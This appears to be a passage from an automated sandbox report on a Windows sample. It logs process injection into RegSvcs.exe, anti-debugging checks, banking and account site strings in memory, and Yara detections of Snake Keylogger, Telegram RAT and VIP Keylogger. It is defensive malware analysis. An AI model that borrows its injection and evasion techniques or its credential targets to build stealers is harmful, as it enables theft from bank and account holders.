Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598050	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597154	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596480	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596322	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595842	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594311	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593547	Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000C99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000042D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000003.00000002.4524527218.00000000045F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4521065991.0000000001468000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0097EAA2 BlockInput,

0_2_0097EAA2

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_00932622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00932622

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009042DE

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00924CE8 mov eax, dword ptr fs:[00000030h]	0_2_00924CE8
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_017F2028 mov eax, dword ptr fs:[00000030h]	0_2_017F2028
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_017F0978 mov eax, dword ptr fs:[00000030h]	0_2_017F0978
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_017F1FC8 mov eax, dword ptr fs:[00000030h]	0_2_017F1FC8
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F94CE8 mov eax, dword ptr fs:[00000030h]	2_2_00F94CE8
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00BE5598 mov eax, dword ptr fs:[00000030h]	2_2_00BE5598
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00BE5538 mov eax, dword ptr fs:[00000030h]	2_2_00BE5538
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00BE3EE8 mov eax, dword ptr fs:[00000030h]	2_2_00BE3EE8
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 5_2_01385C28 mov eax, dword ptr fs:[00000030h]	5_2_01385C28
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 5_2_01387278 mov eax, dword ptr fs:[00000030h]	5_2_01387278
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 5_2_013872D8 mov eax, dword ptr fs:[00000030h]	5_2_013872D8

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_00960B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00960B62

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00932622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00932622
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0092083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0092083F
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_009209D5 SetUnhandledExceptionFilter,	0_2_009209D5
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00920C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00920C21
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00FA2622
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F9083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00F9083F
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F909D5 SetUnhandledExceptionFilter,	2_2_00F909D5
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F90C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00F90C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 104E008			Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 824008			Jump to behavior

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

0_2_00961201

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_00942BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00942BA5

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0096B226 SendInput,keybd_event,

0_2_0096B226

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_009822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_009822DA

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\YJwE2gTm02.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\toggeries\savagenesses.exe "C:\Users\user\AppData\Local\toggeries\savagenesses.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\toggeries\savagenesses.exe"	Jump to behavior

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

0_2_00960B62

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_00961663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00961663

Source: YJwE2gTm02.exe, savagenesses.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: YJwE2gTm02.exe, savagenesses.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_00920698 cpuid

0_2_00920698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_00978195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00978195

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0095D27A GetUserNameW,

0_2_0095D27A

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0093B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0093B952

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009042DE

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 2636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 3620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5552, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
